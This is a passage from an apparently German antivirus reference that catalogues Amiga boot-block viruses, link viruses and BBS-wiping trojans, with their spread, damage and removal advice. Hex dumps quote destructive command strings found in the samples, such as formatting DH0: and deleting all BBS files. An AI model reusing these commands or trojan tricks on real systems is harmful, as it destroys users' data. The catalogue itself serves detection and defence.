7a786a62 676d6d6b 65757775 l.; zxjbgmmkeuwu 39333233 2c746e63 48414841 21204841 9323,tncHAHA! HA 48412179 62657476 63686564 74697469 HA!ybetvchedtiti 79726367 64220a0a 0a00 yrcgd".... Aber!!! Es wird auch eine neue keymap aktiviert, deren Tastatur- belegung gefaehrliche Sequenzen enthaelt L: 1972 Bytes: 5a020402 1a080122 01230124 4b455942 Z......".#.$KEYB 204b494c 4c45523a 204b4152 4c204552 KILLER: KARL ER ;..... 1d040521 464f524d 41542044 45564943 ...!FORMAT DEVIC 453d4448 303a204e 414d453d 31205120 E=DH0: NAME=1 Q Loeschen Sie bitte ALLE Teile. - SwiftWare siehe bei: Devil_V8_B.Door im File ist zu lesen: 4E5D4E75 0C092020 53776966 74576172 N]Nu.. SwiftWar 65207625 642E2564 202D2000 1B5B313B e v%d.%d - ..[1; 25646D00 00427920 4A616262 61682026 %dm..By Jabbah & 20504F57 001B5B25 646D0000 202D2054 POW..[%dm.. - T 6F702055 706C6F61 64657220 5574696C op Uploader Util - Switch-Off anderer Name: Joshua 2 s.o. - Suicide-Virus BB immer ab $7E120, Kicktag, KickChecksum, Supervisor , KS2.04: GURU Fordert trackdisk.device NICHT . Kodiert mit Byte aus $DFF006 eor.b d1,(a0)+ jeden BB fuer Vermehrung neu. Meldet sich nicht . Schaeden und Vermehrung: BB Namensbegruendung: dekodiert ist im Speicher zu lesen: 3e3e2053 75696369 6465204d 61636869 >> Suicide Machi 6e652062 79204d41 5820696e 2032342e ne by MAX in 24. 30392e31 39393220 3c3c0000 2c790000 09.1992 <<..,y.. - SUMPF.Prg (L) File Laenge: 952 Bytes Wird als Scherz-Programm weitergegeben. Als ob es nicht genug Aerger mit den Viren gaebe. Wird von VT erkannt und Loeschen Sie bitte das Teil sofort. Bitte schauen Sie auch die startup- sequence an. Von der Definition natuerlich kein Virus, da keine Vermehrung. Verbiegt $6c und zurueck. Der Originalwert von $6c kann von dem Programm bei Prozessoren, die mit VecPage arbeiten, NICHT zurueckgesetzt werden. A4000/40: Programm laeuft Es wird mit DisplayAlert ein Text ausgegeben: Warnung !! Zuviele Befehle in den Menüs! Arbeitet da ein Hard-Virus ?! usw. ersparen Sie mir den Rest. - SuperNovaKiller-Virus File siehe bei PHANTOM-Inst. - Sysinfo Trojan Zerstoerung ??????? Filename: Sysinfo_V2.2 Laenge gepackt: 3928 Bytes Laenge entpackt: 5656 Bytes KEIN verbogener Vektor KEINE Vermehrung Soll BBS loeschen siehe unten Vorsicht !!!!! Ich kenne ein SysInfo_V1.1 das sich nur in einigen Bytes unter- scheidet und den Zerstoerungsstring NICHT enthaelt !!!! Es besteht die Gefahr, dass es zu FEHLERKENNUNGEN kommt !!! Die Zerstoerungs-Funktion konnte ich bei Tests auf keinem Amiga-Typ, mit dem ich testen kann, ausloesen. Warum VT das GEPACKTE Teil dennoch erkennt ??? Damit die Erbsenzaehler ruhiger schlafen koennen. Sysinfo_v1.1 Orig. Sysinfo_v2.2 Fake 793f0000 0d0a5379 y?....Sy : 793f0000 0d0a5379 y?....Sy 7374656d 496e666f stemInfo : 7374656d 496e666f stemInfo 2056312e 310d0a00 V1.1... : 2056322e 320d0a00 V2.2... ;...... 3a320000 64656c65 :2..dele : 3a320000 64656c65 :2..dele 74652054 3a330000 te T:3.. : 74652042 42533a23 te BBS:# 64656c65 74652054 delete T : 3f20616c 6c202054 ? all T 3a340000 000003f2 :4...... : 3a340000 000003f2 :4...... - SystemScan-Trojan Zerstoerungsfile Eine Zuordnung zu COP-Varianten ist NICHT nachvollziehbar. Filename: scansystem Laenge ungepackt: 10720 Bytes Keine verbogenen Vektoren Keine Vermehrung Nicht resetfest Im File ist zu lesen: 20537973 74656d53 63616e20 76302e36 SystemScan v0.6 20627920 43686563 6b496e20 2120696e by CheckIn ! in 20313939 35007700 20537973 74656d53 1995.w. SystemS ;..... 63616e20 53797374 656d204c 69627261 can System Libra 72696573 20210a00 5359533a 4c696273 ries !..SYS:Libs ;..... 5359533a 4655434b 21007700 2043616e SYS:FUCK!.w. Can Ueber Cli-Ausgabe wird ein Test vorgetaeuscht. In Wirklichkeit werden in c, devs, l, libs und s alle Files geloescht. Um eine Undelete-Funktion zu verhindern, wird ein File FUCK! (teil- weise sehr gross) geschrieben, das den urspruenglichen Inhalt der geloeschten Files ueberschreiben soll. Dieses File ent- haelt in Wiederholungen den sichtbaren Text von systemscan. Leider keine Rettung moeglich. VT bietet nur loeschen an. - T.ET.E BB Virus anderer Name:BB-Prot Zombi 1 Clone s.u. Unterschied zu Zombi: versucht beim Booten durch die XCopy-Meldung NO VIRUS ON BOOTBLOCK zu taeuschen. Die codierte Zombi-Meldung (intuition) wurde ueberschrieben. Schreibt in den zerstoerten Rootblock als Diskname: 01b0: 07542e45 542e4520 00000000 00000000 .T.ET.E ........ Im Virus-BB ist zu lesen: 4ef90007 a0363e42 422d5072 6f742062 N....6>BB-Prot b 79205420 4520696e 20313200 30360031 y T E in 12.06.1 3939353c 0007ee00 0007ee50 2001fffe 995<.......P ... Da beim Neuschreiben des RootBlocks, die ZOMBI-CheckSum (= falsch fuer T.ET.E) verwendet wird, duerfte wieder einmal ein An- faenger am Werk gewesen sein. - TFC Evergreen 47.11 BB Clone s.u. Text geaendert. 7069643a 000100cb 40544643 20457665 pid:....@TFC Eve 72677265 656e2020 56697275 73203437 rgreen Virus 47 2e313100 01005070 49742069 73206120 .11...PpIt is a ;.... 20202020 20202020 00010020 e828312e ... .(1. 2031302e 20313939 33292020 20202020 10. 1993) - T.F.C. Revenge V1.03 Clone Extreme s.o. Text geaendert und Text im BB verschoben 000100cb 40542e46 2e432e20 52657665 ....@T.F.C. Reve 6e676520 56697275 73205631 2e303300 nge Virus V1.03. ;.... 7265772c 2030362e 30362e31 39393120 rew, 06.06.1991 - T.F.C. Revenge V2.14 Versionsnummer und Datum geaendert, Rest s.o. 000100cb 40542e46 2e432e20 52657665 ....@T.F.C. Reve 6e676520 56697275 73205632 2e313400 nge Virus V2.14. ;.... 7265772c 2032372e 30382e31 39393120 rew, 27.08.1991 - T.F.C. Revenge LoadWB File, Laenge ungepackt: 2804 Bytes Fuehrt LoadWB-Befehl aus und legt T.F.C. Revenge BB im Speicher ab. Verbogene Vektoren siehe bei Extreme. Vermehrung nur als Bootblock moeglich. - TAI-Virus BB anderer Name: SCA-TAI-Virus s.o. - TAI2-Virus BB anderer Name: MAD2-TAI2-Virus s.o. - TAI3-FORPIB-Virus BB s.o. Text geaendert 444f5300 b8e19b72 54414933 6000003e DOS....rTAI3`..> 54686973 20697320 6120426f 6f746c61 This is a Bootla 64657220 616e6420 416e7469 76697275 der and Antiviru 73212044 6f6e7420 6b696c6c 20697420 s! Dont kill it 5654322e 36303a00 00000253 48e77f7f VT2.60:....SH. Hinweis 28.10.93: - Zu diesem Zeitpunkt ist VT2.57 aktuell - Ich habe fuer VT noch NIE (und habe es auch nicht vor!!!!), einen speziellen BB programmiert. Lassen Sie sich also bitte nicht verwirren. Danke - TAI4-TimeBomb.V BB TimeBomb V1.0-Clone s.u. 14202048 61766520 61206e69 63652064 . Have a nice d 61792020 536f7272 7920204c 6f6f6b20 ay Sorry Look 666f7220 542e412e 492e2020 74686520 for T.A.I. the 62657374 2e2e0001 00000000 42b90007 best........B... - TAI5-BB s.o. DUMDUM-Clone - TAI6 BB und File s.o CCCP-Clone - TAI7 BB s.o LAMER1-Clone Das Teil wird von VT als BB nur als LAMER erkannt, da nicht einmal der Zerstoerungstext LAMER geaendert wurde. - TAI7-Inst. Laenge gepackt: 2936 Bytes Laenge entpackt: 4176 Bytes Namensbegruendung: s.u. An loadwb wurde mit Hunklab ein BootJob-File gehaengt. In diesem BootJob-File wurde der Programmierername geaendert und es enthaelt einen LAMER1-BB oder einen anderen Virus.BB Lesbarer Text: 2e2e2ea7 2e3a2825 26372954 2e412e49 .....:(%&7)T.A.I 2e30372e 3a2c2e2e 2e2e2039 2e2ea724 .07.:,.... 9...$ 32727472 61636b64 69736b2e 64657669 2rtrackdisk.devi Gepackt sollte VT loeschen anbieten. Entpackt sollte VT Ausbau anbieten. Vorsicht: Im gepackten Zustand koennte VT das File verwechseln. Entpacken Sie das File dann erst zur Sicherheit mit einem ge- eigneten Entpacker. Danke - TAI8 BB s.o. 16BIT-Crew Clone - TAI9 BB s.o. DAT 89 Clone - TAI10-Inst. BB-Installer Laenge Virusteil: 1336 Bytes Im Virusteil ist zu lesen: 2eff2127 54414920 3130002d 1c535553 ..!'TAI 10.-.SUS Verwendet absolute Speicheradressen, die nicht in jedem Amiga vorhanden sind. Ich habe auf JEDER Maschine, auf der ich das Teil ausprobieren konnte, nur den GURU gesehen. Falls jemand mehr "Glueck" hat, bitte ich um eine Nachricht. Danke Am File sollte das Teil erkannt werden und VT sollte Ausbau an- bieten. Das Teil soll einen TAI10-CLONK.BB installieren (s.u.) . Hinweis 21.01.94: Es ist ein aehnlicher Link an ein File aufge- taucht. Soll VirusSlayer installieren. Wird ebenfalls als TAI10- Inst. erkannt. Da die Routine gleich ist, koennte ein Programm, das diese Arbeit macht, existieren ?????? - TAI10-CLONK-Virus BB CLONK-Virus s.u. Nur Text geaendert: 20746f20 6b696c6c 20626f6f 74766972 to kill bootvir 75732e2e 2eff2127 54414920 3130002d us....!'TAI 10.- 1c535553 50494349 4f555320 424f4f54 .SUSPICIOUS BOOT 424c4f43 4b20464f 554e442e 2e2e00c0 BLOCK FOUND..... - TAI11 Compu3-Clone File Laenge 592 Rest s.o. CompuPhagozyte 3 Namensbegruendung: 20542041 20492020 31312020 202e2e2e T A I 11 ... - TAI13-BB 4 Bloecke Glasnost-Clone s.o. Wird von VT beim BB-Test als Glasnost erkannt. In Block 4 ist uncodiert zu lesen: 646f732e 6c696272 61727900 20542e41 dos.library. T.A 2e492e31 333c0000 002e5380 43ec000c .I.13<....S.C... - Taipan-Chaos anderer Name: Chaos s.o. siehe auch: Chaos, Taipan-Lameblame, CHEATER HIJACKER, POLISH, - Taipan-LameBlame anderer Name: LameBlame s.o. siehe auch: Chaos, Taipan-Chaos, CHEATER HIJACKER, POLISH, - Target cool, im Prg. DoIo , immer $7ec00 schreibt auf jede nicht schreibgeschuetzte Disk, die in Block 880 ab $1b0/1 (=Diskname) eine bestimmte Zeichenfolge enthaelt, ab Track 80 bis Ende (mal was Neues) sinnlose Daten Ursprungsprogramm:target.install (Malta) - tdtj-Trojan Zerstoerungsfile Bekannte Filenamen: BlueSky1.exe 40796 Bytes FAIRLIGHT-1996.exe 40796 Bytes lha20reg.exe 36088 Bytes Wobei BlueSky und Fairlight nur andere Namen fuer das GLEICHE File sind. Keine verbogenen Vektoren Nicht resetfest Im File ist zu lesen: 00000000 00007464 746a2f65 66776a64 ......tdtj/efwjd 6600 f. Wenn Sie mit -1 arbeiten, ergibt sich scsi.device . Schaden: Versucht scsi.device Unit 0 zu oeffnen und ab Block 0 jeden Block in einer Schleife zu ueberschreiben. Das MUSS auffallen !!! - TeleCom-Virus File Laenge: 756 Bytes Cool immer $C71082, im Programm noch DoIo und FindRes . Braucht Execbase im Speicher ab $C00000 . Nur mit KS1.3, da absolute ROM-Einspruenge . Namensbegruendung: Decodiert mit eori.b #$27,(a1)+ ist im Speicher zu lesen: 732f7374 61727475 702d7365 7175656e s/startup-sequen 63650000 2054656c 65436f6d 20d80000 ce.. TeleCom ... Vermehrung: -Schreibt in startup-sequence 1.Zeile $A00A . Also den nichtsichtbaren Filenamen $A0 und ein Return. -Kopiert sich selbst ins Root-Verzeichnis mit Filename $A0. Einfach loeschen und in startup-sequence mit einem Editor die 1.Zeile loeschen. Hinweis: Der unsichtbare Filename $A0 wird auch von BGS9-3 fuer das verschobene Originalprogramm verwendet. Es koennte also zu Verwechslungen kommen. - Telstar Cold, Cool, Zaehlzelle $C0 ganz gemein, taeuscht durch Text Virusprotector 6.0 vor, entschluesselt (neg.b) BBteile nach $7fc00, jeder 4/2.Reset Graphikausgabe (holl. Flagge und Text u.a. Telstar), keine Vermehrungsroutine gefunden. - Termigator: Kick 1.2 (da absolute ROM-Einspruenge) immer $7f4d0, Cool und DoIo entschluesselte Alertmeldung: Only the TERMIGATOR'VIRUS makes it possible! Bye!... Vermehrung: ueber BB - Terrorists PrgFileVirus Laenge 1612 Bytes KickMem, KickTag, KickCheckSum Textausgabe mit GraphikRoutine nimmt Namen des 1.Files in der Startup an verschiebt OrigPrg ins Hauptverzeichnis (unsichtbar A0202020A02020A020A0A0) Vermehrung: jede nichtschreibgeschuetzte Disk mit Startup im PrgFile sichtbar: TTV1 schwarzer Hintergrund, weisse Schrift, zeilenweise THE NAMES HAVE BEEN CHANGED TO PROTECT THE INNOCENT... THE TERRORISTS HAVE YOU UNDER CONTROL EVERYTHING IS DESTROYED YOUR SYSTEM IS INFECTED THERE IS NO HOPE FOR BETTER TIMES THE FIRST TERRORISTS VIRUS !!! Hinweis: es wird ein unsichtbares File (Name s.o.) weiterge- geben mit der Laenge #64 und dem Inhalt "Protection file!". Dieses File soll einen Terrorists-Befall der Disk verhindern. Clone: NoVi - TETRIS-COP-Trojan Zerstoerung Laenge: 21244 Bytes siehe bei COP-TypK-Trojan - Text-Hunk am Anfang Dieser Text-Hunk ist KEIN Virus !!!!!!!!! Aber die Filestruktur wird so veraendert, dass Link- und File- Viren nicht mehr gefunden werden koennen. Negativbeispiel siehe unten. Ueber Dos.library-Funktionen erfolgt eine Textausgabe ins Cli . Beispiel: 4cdf7fff 4ef90000 0000646f 732e6c69 L..N.....dos.li 62726172 79000000 06550000 001d0000 brary....U...... 069e0c20 20202020 5f5f2020 20202020 ... __ 20202020 5f5f2020 20202020 20205f5f __ __ 20202020 20202020 20202020 20202020 20205f20 5f5f5f20 20202020 20202020 _ ___ 20202020 20202020 202f5c0a 205f5f5f /\. ___ 2f20205c 5f5f5f5f 5f5f5f5f 2f20205c / \________/ \ Diese Hunks scheinen fuer Boxenwerbung verwendet zu werden. Die Erzeugerprogramme sind mir unbekannt. Falls Sie mir helfen wollen, schicken Sie mir bitte diese Programme zu. Danke !! Falls Sie weitere Text-Hunk-Varianten finden, die VT noch nicht kennt, schicken Sie mir bitte mehrere Beispiele zu. Danke !! VT bietet Ausbau an, weil ich in den mir bekannten Beispielen, keine Routinen gefunden habe, die fuer das eigentliche File zur Lauffaehigkeit notwendig gewesen waeren. (Solche Routinen koennten sein: Fastmem und/oder Cache aus). Arbeiten Sie zur Sicherheit mit einer Kopie. Danke !! Fuehren Sie nach dem Text-Hunk-Ausbau UNBEDINGT einen KOMPLETTEN Test durch, da erst jetzt Viren erkannt werden koennen. Negativ-Beispiel: DENISTRO.EXE Laenge mit Text-Hunks und Commander-Virus 71800 Bytes Laenge ALLES ausgebaut 64844 Bytes In diesem File erkennt im Moment (25.11.94) beim Filetest KEIN AntiVirusProgramm den Commander-Virus. Ich gehe aber davon aus, dass bei den Updates das Problem behoben wird. VT2.68 (also schon zwei Monate alt) findet den Commander-Virus aber schon beim BlockKetteTest. Ziehen Sie bitte aus diesem Vorfall folgende Schluesse: - Formatieren Sie die RAD: lang nicht Quick - Entpacken Sie Archive aus Mailboxen in die RAD: und nicht ins RAM: - Geben Sie sich nicht mit einem Filetest zufrieden, sondern fuehren Sie auch einen BlockKetteTest durch. - THAHO8 BB es ist KEIN Virus Empfehlung: loeschen VT kennt: 21.10.92 Die Format- und BB-Kopier-Routine im BB ab $1FE wird NIE er- reicht. Ueber Graphik wird auf schwarzem Hintergrund mit heller Schrift ausgegeben: THAHO8 VIRUS V2.0 Im BB ist zu lesen: 00000000 54686973 20697320 74686520 ....This is the 6D696768 74792054 6861686F 38205669 mighty Thaho8 Vi 72757320 56322E30 21202045 61742073 rus V2.0! Eat s 6869742C 204C414D 45522120 20546861 hit, LAMER! Tha 686F2054 6861686F 20546861 686F2054 ho Thaho Thaho T 6861686F 20546861 686F2054 6861686F haho Thaho Thaho - The FAT Stinkbomb 2 BB EXTREME-Clone Bei mir FAT 2 Virus siehe oben - The FAT Stinkbomb 1 BB TimeBomb V1.0-Clone Bei mir FAT 1 Virus siehe oben - The Return of STARCOM siehe bei STARCOMReturn - THE SMILY CANCER LinkVirus, verlaengert das Prg. um 3916 Bytes Fastmem ja, im Speicher immer ab $7F000, KickTag, KickCheckSum, SumKickData, im Prg. noch BeginIo und $6c = Vec3 PrgTeile decodiert mit ror.b #2,d1 oder codiert mit rol.b #2,d1 befaellt das erste File der startup-sequence, testet n i c h t auf Sonderzeichen im Filenamen, d.h. jedes File wird befallen nach 20 Vermehrungen: Mauszeiger aendert sich in gelben Kopf (smily) mit blauem Hut und Endlosausgabe einer roten Laufschrift: "????????.........." " HI THERE!!! A NEW AGE IN VIRUS MAKING HAS BEGUN!!!" " THANX TO US... THANKX TO: --- CENTURIONS --- " " AND WE HAVE THE PLEASURE TO INFORM YOU THAT SOME" " OF YOUR DISKS ARE INFECTED BY OUR FIRST MASTERPIECE" " CALLED: ` THE SMILY CANCER ` " " HAVE FUN LOOKING FOR IT... AND STAY TUNED FOR OUR NEXT PRODUCTIONS. " " CENTURIONS: THE FUTURE IS NEAR!" " " Ausserdem ist im decodierten Prg noch zu lesen: (erscheint nicht in der Laufschrift) HELLO HACKERS OUT THERE!! A NEW FORCE HAS BORN IN ITALY: --- CENTURIONS ---. OUR TEAM IS COMPOSED OF 2 GUYZ: ME & HIM.(AHAHHA!) THE AIM OF - - CENTURIONS - - IS JUST VIRUS MAKING.. WE HAVE LOTTA FUN DOING THIS AND WE ALSO HOPE TO GIVE FUN TO THE KILLERS MAKERS (HI STEVE TIBBETT!) HAW! HAW! HAW! SIGNED: ME & HIM / CENTURIONS Hinweis: Ich besitze ein Smily-File mit vier Links Hinweis 96-11-03: Ab KS2.04 und hoeher zerstoert das Virusteil beim Anlinken die Disk-Struktur (vgl. VT-Blockkette Fehlermeldung "Data- BlockList<>FirstDataBlock". Das gelinkte File kann dann unter KS2.04 und hoeher von VT nur als "File defekt?" erkannt werden. Versuchen Sie mit einem Filemonitor ab KS2.04 so ein File anzuschauen, dann werden Sie eine Fehlermeldung erhalten. Wichtig: Diese Aussagen gelten NUR, wenn das gelinkte File unter KS2.04 oder hoeher erzeugt wurde. Gelinkte Files die unter KS1.2 oder KS1.3 erzeugt wurden, werden von VT auch unter KS2.04 und hoeher erkannt und ausgebaut, da ja die File- struktur in Ordnung ist. - The Smily Cancer II Filevirus Laenge: 4676 2x verschluesselt nach 1x entschluesseln mit eori.b #$90,d1 subi.b #$22,d1 kann man am Fileende lesen: CENTURIONS STRIKES BACK: THE SMILY CANCER II Beim Starten des Programms wird der loadwb-Befehl simuliert und das Virusteil setzt sich im Speicher fest. Die Vermehrung erfolgt dann als Smily 1, d.h. es findet KEINE Vermehrung als Smily II statt. siehe oben Hinweis: Es wird ein Smily-File (Laenge 4792 Bytes, ab $200 im File Text zu lesen) in Deutschland weitergegeben, das NICHT lauffaehig ist (April 92). Dieses Prg wird von VT NICHT erkannt, da keine Gefahr besteht. Lasst solche Scherze und verunsichert nicht die Amiga-Benutzer !!!! Hinweis 03.09.92: Ab VT2.44 sollten mehrere SmilyLinks ans gleiche File in einem Durchgang ausgebaut werden. Falls nein, melden Sie sich bitte. Danke Hinweis 16.04.93: Es ist ein Smily Clone aufgetaucht. Laenge: verlaengert ein File um 3916 Bytes FAST KEIN mit Absicht verseuchtes File war lauffaehig. Das laesst den Schluss zu, dass der addbuffers-befehl von Hand manipuliert wurde. VT hat die Files wieder auf die Original-Laenge verkuerzt und die Startup-Sequence war danach wieder lauffaehig. Unterschied zu Original: Der Sprung-Befehl zur Decodier-Routine wurde geaendert. weiteres Verhalten: siehe oben Hinweis 12.06.93: Es tauchen immer haeufiger defekte Smily-Files auf. VT sollte beim Ausbauversuch eine defekte Hunk-Struktur erkennen und das Loeschen des Files anbieten. Bitte vergessen Sie dann nicht, die Startup-Sequence zu ueberpruefen und bei Bedarf das unverseuchte Originalfile neu aufzukopieren. SMILY-CANCER defekt: File Ein Beispiel: Nach Fileheader muesste das File aus vier Hunks be- stehen. Jemand hat nun nach dem Virusteil das File abgeschnitten. Da ist dann natuerlich ein Ausbau nicht sinnvoll. - The Traveller 1.0 KickTag, KickCheckSum, im Prg. DoIo u. $6c, immer $7F000 abhaengig vom Zaehlerstand: Textausgabe roter,gruener und blauer Balken, schwarze Schrift NEVER HEARD OF VIRUS-PROTECTION ??? -LAMER !!! Vermehrung und Schaden: BB (auch HD !!!!!!!!!) - Tick siehe unter Julie - TimeBomb V0.9 Trojanisches Pferd wird mit dem Prg. BMassacre erzeugt (da steht auch TimeBomb V0.9) siehe auch BB-MASSACRE besteht aus 2 Teilen in SubDir c und Root: in c: .info = Virus Laenge: 7840 Bytes in Root: pic.xx = Zaehler (Startwert=6) Laenge: 1 Byte in der 1.Zeile der startup steht: c/.info nicht resident, keine Vermehrungsroutine in .info Verhalten: vermindert bei jedem Neustart den Wert in pic.xx um 1 . Sobald 0 erreicht ist, wird die Disk formatiert (Track 0-159) . Damit der Wert in pic.xx geaendert werden kann, darf die Disk nicht schreibgeschuetzt sein. Falls doch, erscheint: User Request : Please remove write Protection and press left Mouse Button to continue.. Eine weitere Abarbeitung der startup-sequence ist ohne Oeffnung der Disk nicht moeglich. Im Cli wird immer ausgegeben: RAM CHECKED - NO VIRUS FOUND. - TimeBomb V0.9 Clone Trojanisches Pferd Wird von VT als Timebomb erkannt. besteht aus 2 Teilen in SubDir c und Root: in c: .info = Virus Laenge mit PP: 1584 Bytes in Root: setmap = Zaehler (Startwert=FF) Laenge: 1 Byte in der 1.Zeile der startup steht: c/.info nicht resident, keine Vermehrungsroutine in .info Verhalten: vermindert bei jedem Neustart den Wert in setmap um 1 . Sobald 0 erreicht ist, wird die Disk formatiert (Track 0-150) . Textausgabe danach: Hey Looser ! Boot again ! Damit der Wert in df0:setmap geaendert werden kann, darf die Disk nicht schreibgeschuetzt sein. Falls doch, erscheint: User Request : Please remove write Protection and press left Mouse Button to continue.. Eine weitere Abarbeitung der startup-sequence ist ohne Oeffnung der Disk nicht moeglich. Im Cli wird ausgegeben: DISC SPEEDER BY BUD usw VT bietet im FileTest loeschen an und sucht auch nach setmap (1Byte). Falls gefunden, wird auch setmap im Rootverzeichnis geloescht. - TimeBomb V1.0 BB-Virus ( verbiegt keine "bekannten" Zeiger ) (je nach Zaehlerstand wird eigener BootBlock geschrieben, (( Einsprung bei #$70208)) oder Track 80 (Directory) mit Speicherinhalt ab #$20000 ueberschrieben = Disk wird unlesbar !!!) (( Einsprung bei #$70026)) Sichert eigenen Speicher NICHT. Kann also ueberschrieben werden !!! Clone: FAT 1 Virus, O.M.S.A Virus, Lame Game Virus, TAI4-Virus, - Time Bomber Trojanisches Pferd wird mit dem Prg. TimeBomber erzeugt besteht aus 2 Teilen in RootDir: virustest = Virus Laenge: 936 Bytes virustest.data = Zaehler (Startwert=5) Laenge: 1 Byte in der 1.Zeile der startup steht: virustest nicht resident, keine Vermehrungsroutine in virustest Verhalten: vermindert bei jedem Neustart den Wert in virustest.data um 1 .Sobald 0 erreicht ist, wird die Disk formatiert. Damit der Wert in virustest.data geaendert werden kann, darf die Disk nicht schreibgeschuetzt sein. Falls doch, erscheint: User Request : Please remove write Protection and press left Mouse Button to continue.. Eine weitere Abarbeitung der startup-sequence ist ohne Oeffnung der Disk nicht moeglich. Im Cli wird immer ausgegeben: RAM checked - no virus found. - Time Bomber-Inst. File Laenge gepackt: 17464 Bytes Laenge ungepackt: 45640 Bytes Programm um nach DF0: die 2 Time Bomber Files (s.o.) zu schreiben. Wird von selbst NICHT aktiv. Keine verbogenen Vektoren. VT bietet loeschen an. - Timer-Virus Files 2 Files: timer Laenge:4812 setmap Laenge:1712 Verbiegt $74 (ZeroPage) Verbiegt $74 VecPage NICHT (Hallo Enforcer-Freunde) Beim timer-File handelt es sich um das install-Programm. Zur Taeuschung wird ein Fenster (V1.1) geoeffnet und es erfolgt die Ausgabe: Ram .... Chip .... Time .... Date .... In Wirklichkeit wird aber versucht :c/setmap und/oder :system/setmap zu kopieren. Die Unterverzeichnisse muessen existieren und koennen vom timer-Prg NICHT angelegt werden. Nachweis: z.B. snoopdos Das timer-File enthaelt das setmap-File uncodiert. Beim naechsten reset wird nun der falsche setmap-Befehl aufgerufen, wenn er in ihrer s.-seq. steht. - installiert Zeichensatz - verbiegt $74 auf eigene Routine - oeffnet console.device $74-Routine: - arbeitet am seriellen Port $DFF018, $DFF019 - testet nach meiner Meinung eingehende Zeichen - hat den execute-Befehl - enthaelt eine Zeitschleife - am Schluss jmp Orig.-$74 Koennte ein Prg. sein, um in eine Mailbox einzubrechen ???? $74-Erkennung mit VT getestet : 29.09.92 timer-Erkennung mit VT getestet : 29.09.92 setmap-Erkennung mit VT getestet : 29.09.92 Empfehlung: loeschen Sie die beiden Files mit VT und kopieren Sie bei Bedarf das setmap-File neu auf. Zeichen, die so im Orig_Setmap_File NICHT vorkommen: 00004E75 72616D64 72697665 2E646576 ..Nuramdrive.dev 69636500 636F6E73 6F6C652E 64657669 ice.console.devi 63650000 3A646576 732F6B65 796D6170 ce..:devs/keymap 732F6400 00000000 00000000 00000000 s/d............. 646F732E 6C696272 61727900 00000000 dos.library..... . . . 00000000 00000000 00000000 646F732E ............dos. 6C696272 61727900 52414D3A 436F6D6D library.RAM:Comm 616E642D 30302D54 30310000 00000000 and-00-T01...... - TNK noch ein SCA-Clone 08.04.92 im BB zu lesen: 32162054 68697320 77617320 54686520 2. This was The 4e657720 4b696420 dc6e0000 4ef90000 New Kid .n..N... 0000412e 544e4b21 544e4b21 544e4b21 ..A.TNK!TNK!TNK! 544e4b21 544e4b21 544e4b21 544e4b21 TNK!TNK!TNK!TNK! - Tomates-Gentechnic-Service = TimeBomb-BB-Clone nur der Text wurde veraendert - Tomates-Gentechnic-Service 2 = Coder.BB Wieder eine Meisterleistung. Der Text wurde geaendert. Lesen Sie bitte bei Coder.BB nach. Im BB ist zu lesen: 546f6d61 7465732d 47656e74 6563686e Tomates-Gentechn 69632d53 65727669 63652032 2e30202d ic-Service 2.0 - 2d2d2054 68652042 65737420 696e2045 -- The Best in E 75726f70 65203139 39322021 21201400 urope 1992 !! .. ;....... 8059a5c9 d5cd8084 8400416e 74697669 .Y........Antivi 7275732d 436f6465 20426567 696e2024 rus-Code Begin $ 37666130 302d59a5 c9d5cd80 84842d45 7fa00-Y.......-E 6e642024 37666134 3020446f 6e742069 nd $7fa40 Dont i 6e737461 6c6c2074 68697320 4d414749 nstall this MAGI 432d424f 4f54424c 4f434b20 4265726c C-BOOTBLOCK Berl 696e204a 756c7927 393259a5 c9d5cd80 in July'92Y..... 84486176 65206120 676f6f64 20776179 .Have a good way Im Speicher wird mit ror.b #2,d1 und FALSCHER Laenge decodiert: 20202020 2020746f 6d617465 732d6765 tomates-ge 6e746563 686e6963 2d736572 76696365 ntechnic-service 20212120 67726565 74696e67 7320746f !! greetings to 2065696e 732d676d 62682061 6e64206b eins-gmbh and k 6f626f6c 2d646174 61202121 21202056 obol-data !!! V - TOPDOG anderer Name: Top util s.u. - Top util Virus Laenge ungepackt: 2260 Bytes Namensbegruendung: Top util By Zacker of EnSoniC V1.0 ist im File zu lesen. Wurde mir ungepackt zugeschickt. Wird deshalb von VT nur unge- packt erkannt. Bleibt NICHT im Speicher, deshalb keine Speicher- erkennung notwendig. Von der Definition kein Virus, da keine Ver- mehrung. Ein Zerstoerungsfile gegen BBS gerichtet. Also fuer den User ohne Mail-Box ungefaehrlich. Versucht durch Cli-Ausgabe zu taeuschen: Top util By Zacker of EnSoniC V1.0 Call Zack BBS 16.8 HST 407-232-6324 HST ONLY !! USEAGE: Top (num /ALL) <-Hfname> <-Sfname> <-Ttext> num : Min. megs to get on the list ALL : Show all users (default to BBS:User.rpt) -H : Use the file name after -H as the TOP hdr if no -s is used default = BBS:user.rpt -T : text to be used with top dog : TOPDOG (I just added) -S : Use the file name after -S as TOP list Schaden in Wirklichkeit: bbs:user.data wird mit Laenge 66 Bytes neu angelegt, d.h. ein altes user.data-file geht verloren: 0000: 0CEBEAE5 EAA0F4E9 E9E9F4E7 B4A0E9F7 0010: EDF6E5F7 E5F7E9A0 E9F2E5F7 E7E5F7A0 0020: 67726577 67206565 20200A20 54686520 grewg ee . The 0030: 54687265 65204D75 736B6574 65657273 Three Musketeers 0040: 200A Fileerkennung mit VT : 02.11.92 Empfehlung: File einfach loeschen - Trabbi Link anderer Name: Hochofen s.o. - Trainer-Trojan File Zerstoerung Filename: Trainer.exe Laenge gepackt: 592 Bytes VT bietet Loeschen an. Im entpackten File ist zu lesen: 00006262 733a636f ..bbs:co 6e66636f 6e666967 2e696e66 6f006262 nfconfig.info.bb 733a7573 65722e64 61746100 6c696273 s:user.data.libs 3a616564 6f6f722e 6c696272 61727900 :aedoor.library. 6c696273 3a426f6f 74626c6f 636b2e6c libs:Bootblock.l 69627261 7279006c 6962733a 61652e6c ibrary.libs:ae.l 69627261 7279006c 6962733a 6578706c ibrary.libs:expl 6f64652e 6c696272 61727900 6c696273 ode.library.libs 3a46696c 6549442e 6c696272 61727900 :FileID.library. 4c696273 3a667265 65616e69 6d2e6c69 Libs:freeanim.li 62726172 79006c69 62733a69 66667061 brary.libs:iffpa 7273652e 6c696272 61727900 6c696273 rse.library.libs 3a726571 746f6f6c 732e6c69 62726172 :reqtools.librar 79006c69 62733a74 72616e73 6c61746f y.libs:translato 722e6c69 62726172 79006c69 62733a78 r.library.libs:x 70727a6d 6f64656d 2e6c6962 72617279 przmodem.library Schaden: Einige Files (s.o.) sollen mit dosdelete geloescht werden. Versuchen Sie bei Bedarf mit DiskSalv eine Rettung. - Traveling Jack LinkVirusPrg mit variabler HunkLaenge verbiegt DosBase+$2E (= dos.library-Zeiger ins 